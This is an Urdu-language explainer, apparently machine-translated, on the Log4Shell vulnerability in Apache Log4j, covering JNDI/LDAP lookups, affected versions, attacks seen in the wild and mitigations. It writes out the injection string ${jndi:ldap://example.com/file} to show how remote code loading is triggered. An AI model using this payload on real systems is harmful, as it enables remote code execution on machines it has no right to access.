کی میز کے مندرجات[چھپائیں][دکھائیں]
نومبر 2021 کے آخر میں، ہم نے سائبر سیکیورٹی کے لیے ایک بڑے خطرے کا پتہ لگایا۔ یہ استحصال ممکنہ طور پر دنیا بھر میں لاکھوں کمپیوٹر سسٹمز کو متاثر کرے گا۔
یہ Log4j کی کمزوری کے بارے میں ایک رہنما ہے اور کس طرح ایک نظر انداز کردہ ڈیزائن کی خامی نے دنیا کی 90% سے زیادہ کمپیوٹر سروسز کو حملے کے لیے کھلا چھوڑ دیا۔
Apache Log4j ایک اوپن سورس جاوا پر مبنی لاگنگ یوٹیلیٹی ہے جسے اپاچی سافٹ ویئر فاؤنڈیشن نے تیار کیا ہے۔ اصل میں Ceki Gülcü نے 2001 میں لکھا تھا، یہ اب اپاچی لاگنگ سروسز کا حصہ ہے، جو اپاچی سافٹ ویئر فاؤنڈیشن کا ایک پروجیکٹ ہے۔
دنیا بھر کی کمپنیاں اپنی ایپلی کیشنز پر لاگ ان کرنے کے لیے Log4j لائبریری کا استعمال کرتی ہیں۔ درحقیقت، جاوا لائبریری بہت وسیع ہے، آپ اسے ایمیزون، مائیکروسافٹ، گوگل اور مزید کی ایپلی کیشنز میں تلاش کر سکتے ہیں۔
لائبریری کی اہمیت کا مطلب یہ ہے کہ کوڈ میں کسی بھی ممکنہ خامی سے لاکھوں کمپیوٹرز ہیکنگ کے لیے کھلے رہ سکتے ہیں۔ 24 نومبر 2021 کو ایک کلاؤڈ سیکیورٹی علی بابا کے لیے کام کرنے والے محقق نے ایک خوفناک خامی دریافت کی۔
Log4j کمزوری، جسے Log4Shell کے نام سے بھی جانا جاتا ہے، 2013 سے کسی کا دھیان نہیں دیا گیا ہے۔ اس خطرے نے نقصان دہ اداکاروں کو Log4j چلانے والے متاثرہ سسٹمز پر کوڈ چلانے کی اجازت دی۔ اس کا انکشاف 9 دسمبر 2021 کو ہوا تھا۔
صنعت کے ماہرین Log4Shell کی خامی کو کہتے ہیں۔ حالیہ میموری میں سب سے بڑا خطرہ.
خطرے کی اشاعت کے بعد کے ہفتے میں، سائبر سیکیورٹی ٹیموں نے لاکھوں حملوں کا پتہ لگایا۔ کچھ محققین نے یہاں تک کہ فی منٹ سو سے زیادہ حملوں کی شرح کا مشاہدہ کیا۔
یہ کس طرح کام کرتا ہے؟
یہ سمجھنے کے لیے کہ Log4Shell اتنا خطرناک کیوں ہے، ہمیں یہ سمجھنے کی ضرورت ہے کہ یہ کیا قابل ہے۔
Log4Shell کمزوری صوابدیدی کوڈ پر عمل درآمد کی اجازت دیتی ہے، جس کا بنیادی مطلب یہ ہے کہ حملہ آور ٹارگٹ مشین پر کوئی بھی کمانڈ یا کوڈ چلا سکتا ہے۔
یہ کیسے پورا کرتا ہے؟
سب سے پہلے، ہمیں یہ سمجھنے کی ضرورت ہے کہ JNDI کیا ہے۔
Java Naming and Directory Interface (JNDI) ایک جاوا سروس ہے جو جاوا پروگراموں کو نام کے ذریعے ڈیٹا اور وسائل کو دریافت کرنے اور تلاش کرنے کی اجازت دیتی ہے۔ یہ ڈائریکٹری خدمات اہم ہیں کیونکہ وہ ایپلیکیشنز بناتے وقت ڈویلپرز کو آسانی سے حوالہ دینے کے لیے ریکارڈ کا ایک منظم سیٹ فراہم کرتی ہیں۔
JNDI کسی مخصوص ڈائریکٹری تک رسائی کے لیے مختلف پروٹوکول استعمال کر سکتا ہے۔ ان پروٹوکولز میں سے ایک لائٹ ویٹ ڈائرکٹری ایکسیس پروٹوکول، یا LDAP ہے۔
سٹرنگ لاگ کرتے وقت، log4j جب وہ فارم کے تاثرات کا سامنا کرتے ہیں تو سٹرنگ کے متبادل کو انجام دیتا ہے۔ ${prefix:name}
.
مثال کے طور پر، Text: ${java:version}
متن کے طور پر لاگ ان کیا جا سکتا ہے: جاوا ورژن 1.8.0_65۔ اس قسم کے متبادلات عام ہیں۔
ہم اس طرح کے اظہار بھی کر سکتے ہیں Text: ${jndi:ldap://example.com/file}
جو LDAP پروٹوکول کے ذریعے URL سے جاوا آبجیکٹ لوڈ کرنے کے لیے JNDI سسٹم کا استعمال کرتا ہے۔
یہ اس URL سے آنے والے ڈیٹا کو مؤثر طریقے سے مشین میں لوڈ کرتا ہے۔ کوئی بھی ممکنہ ہیکر عوامی یو آر ایل پر بدنیتی پر مبنی کوڈ کی میزبانی کر سکتا ہے اور اسے لاگ کرنے کے لیے Log4j استعمال کرنے والی مشینوں کا انتظار کر سکتا ہے۔
چونکہ لاگ پیغامات کے مواد میں صارف کے زیر کنٹرول ڈیٹا ہوتا ہے، اس لیے ہیکرز اپنے JNDI حوالہ جات داخل کر سکتے ہیں جو LDAP سرورز کی طرف اشارہ کرتے ہیں جنہیں وہ کنٹرول کرتے ہیں۔ یہ LDAP سرورز نقصان دہ جاوا اشیاء سے بھرے ہو سکتے ہیں جنہیں JNDI کمزوری کے ذریعے انجام دے سکتا ہے۔
جو چیز اس کو بدتر بناتی ہے وہ یہ ہے کہ اس سے کوئی فرق نہیں پڑتا کہ ایپلی کیشن سرور سائڈ ہے یا کلائنٹ سائڈ ایپلی کیشن۔
جب تک لاگر کے لیے حملہ آور کے بدنیتی پر مبنی کوڈ کو پڑھنے کا کوئی طریقہ موجود ہے، ایپلیکیشن اب بھی استحصال کے لیے کھلی ہے۔
کون متاثر ہوا ہے؟
کمزوری ان تمام سسٹمز اور سروسز کو متاثر کرتی ہے جو Apache Log4j استعمال کرتے ہیں، ورژن 2.0 تک اور 2.14.1 سمیت۔
کئی سیکورٹی ماہرین مشورہ دیتے ہیں کہ کمزوری جاوا استعمال کرنے والی متعدد ایپلیکیشنز کو متاثر کر سکتی ہے۔
یہ خامی سب سے پہلے مائیکروسافٹ کی ملکیت والی مائن کرافٹ ویڈیو گیم میں دریافت ہوئی تھی۔ مائیکروسافٹ نے اپنے صارفین پر زور دیا ہے کہ وہ اپنے جاوا ایڈیشن مائن کرافٹ سافٹ ویئر کو اپ گریڈ کریں تاکہ کسی بھی خطرے سے بچا جا سکے۔
سائبرسیکیوریٹی اینڈ انفراسٹرکچر سیکیورٹی ایجنسی (CISA) کے ڈائریکٹر جین ایسٹرلی کا کہنا ہے کہ دکانداروں کے پاس اہم ذمہ داری اس خطرے سے فائدہ اٹھانے والے نقصان دہ اداکاروں سے اختتامی صارفین کو روکنے کے لیے۔
"وینڈرز کو بھی اپنے صارفین کے ساتھ بات چیت کرنی چاہیے تاکہ یہ یقینی بنایا جا سکے کہ آخری صارفین کو معلوم ہو کہ ان کی مصنوعات میں یہ کمزوری ہے اور اسے سافٹ ویئر اپ ڈیٹس کو ترجیح دینی چاہیے۔"
اطلاعات کے مطابق حملے پہلے ہی شروع ہو چکے ہیں۔ Symantec، ایک کمپنی جو سائبر سیکیورٹی سافٹ ویئر فراہم کرتی ہے، نے متعدد حملوں کی درخواستوں کا مشاہدہ کیا ہے۔
یہاں حملوں کی ان اقسام کی کچھ مثالیں ہیں جن کا محققین نے پتہ لگایا ہے:
- botnets
Botnets کمپیوٹرز کا ایک نیٹ ورک ہے جو ایک ہی حملہ آور فریق کے کنٹرول میں ہے۔ وہ DDoS حملوں کو انجام دینے، ڈیٹا چوری کرنے اور دیگر گھوٹالوں میں مدد کرتے ہیں۔ محققین نے Log4j استحصال سے ڈاؤن لوڈ کردہ شیل اسکرپٹس میں مشتک بوٹ نیٹ کا مشاہدہ کیا۔
- XMRig Miner ٹروجن
XMRig ایک اوپن سورس کریپٹو کرنسی مائنر ہے جو Monero ٹوکن کو مائن کرنے کے لیے CPUs کا استعمال کرتا ہے۔ سائبر کرائمینز لوگوں کے آلات پر XMRig انسٹال کر سکتے ہیں تاکہ وہ اپنی پروسیسنگ پاور کو ان کے علم کے بغیر استعمال کر سکیں۔
- کھونساری رینسم ویئر
Ransomware سے مراد میلویئر کی ایک شکل ہے جسے ڈیزائن کیا گیا ہے۔ فائلوں کو خفیہ کریں۔ کمپیوٹر پر حملہ آور پھر انکرپٹڈ فائلوں تک واپس رسائی دینے کے بدلے ادائیگی کا مطالبہ کر سکتے ہیں۔ محققین نے Log4Shell حملوں میں Khonsari ransomware دریافت کیا۔ وہ ونڈوز سرورز کو نشانہ بناتے ہیں اور .NET فریم ورک کا استعمال کرتے ہیں۔
آگے کیا ہوگا؟
ماہرین نے پیش گوئی کی ہے کہ Log4J کے خطرے سے پیدا ہونے والی افراتفری کو مکمل طور پر ٹھیک کرنے میں مہینوں یا شاید سال بھی لگ سکتے ہیں۔
اس عمل میں ہر متاثرہ سسٹم کو پیچ شدہ ورژن کے ساتھ اپ ڈیٹ کرنا شامل ہے۔ یہاں تک کہ اگر ان تمام سسٹمز کو پیچ کر دیا گیا ہے، تب بھی ممکنہ پچھلے دروازوں کا خطرہ بڑھ رہا ہے جسے ہیکرز نے پہلے ہی اس ونڈو میں شامل کر دیا ہے کہ سرور حملے کے لیے کھلے تھے۔
بہت حل اور تخفیف ایپلی کیشنز کو اس مسئلے سے فائدہ اٹھانے سے روکنے کے لیے موجود ہے۔ نئے Log4j ورژن 2.15.0-rc1 نے اس خطرے کو کم کرنے کے لیے مختلف ترتیبات کو تبدیل کر دیا۔
JNDI استعمال کرنے والی تمام خصوصیات بطور ڈیفالٹ غیر فعال ہو جائیں گی اور ریموٹ تلاش کو بھی محدود کر دیا گیا ہے۔ آپ کے Log4j سیٹ اپ پر تلاش کی خصوصیت کو غیر فعال کرنے سے ممکنہ استحصال کے خطرے کو کم کرنے میں مدد ملے گی۔
Log4j کے باہر، اوپن سورس کے استحصال کو روکنے کے لیے اب بھی ایک وسیع تر منصوبہ بندی کی ضرورت ہے۔
اس سے قبل مئی میں وائٹ ہاؤس نے ایک جاری کیا تھا۔ ایگزیکٹو آرڈر جس کا مقصد قومی سائبر سیکیورٹی کو بہتر بنانا تھا۔ اس میں سافٹ ویئر بل آف میٹریلز (SBOM) کی فراہمی شامل تھی جو بنیادی طور پر ایک رسمی دستاویز تھی جس میں درخواست کی تعمیر کے لیے درکار ہر شے کی فہرست تھی۔
اس میں اس طرح کے حصے شامل ہیں۔ اوپن سورس پیکیجز، انحصار، اور APIs ترقی کے لیے استعمال ہوتے ہیں۔ اگرچہ SBOMs کا خیال شفافیت کے لیے مددگار ہے، لیکن کیا یہ واقعی صارفین کی مدد کرے گا؟
انحصار کو اپ گریڈ کرنا بہت زیادہ پریشانی کا باعث ہو سکتا ہے۔ کمپنیاں متبادل پیکجوں کی تلاش میں اضافی وقت ضائع کرنے کے خطرے کے بجائے کوئی جرمانہ ادا کرنے کا انتخاب کر سکتی ہیں۔ شاید یہ SBOMs صرف اس صورت میں کارآمد ہوں گے جب ان کے گنجائش مزید محدود ہے.
نتیجہ
Log4j مسئلہ تنظیموں کے لیے صرف ایک تکنیکی مسئلہ سے زیادہ ہے۔
کاروباری رہنماؤں کو ممکنہ خطرات سے آگاہ ہونا چاہیے جو اس وقت ہو سکتے ہیں جب ان کے سرورز، مصنوعات یا خدمات کوڈ پر انحصار کرتے ہیں جسے وہ خود برقرار نہیں رکھتے ہیں۔
اوپن سورس اور تھرڈ پارٹی ایپلی کیشنز پر انحصار کرنا ہمیشہ کچھ خطرے کے ساتھ آتا ہے۔ کمپنیوں کو نئے خطرات کے سامنے آنے سے پہلے خطرے کو کم کرنے کی حکمت عملی پر غور کرنا چاہیے۔
ویب کا زیادہ تر حصہ دنیا بھر میں ہزاروں رضاکاروں کے زیر انتظام اوپن سورس سافٹ ویئر پر انحصار کرتا ہے۔
اگر ہم ویب کو ایک محفوظ جگہ رکھنا چاہتے ہیں تو حکومتوں اور کارپوریشنوں کو اوپن سورس کی کوششوں اور سائبر سیکیورٹی ایجنسیوں جیسے کہ سی آئی ایس اے.
جواب دیجئے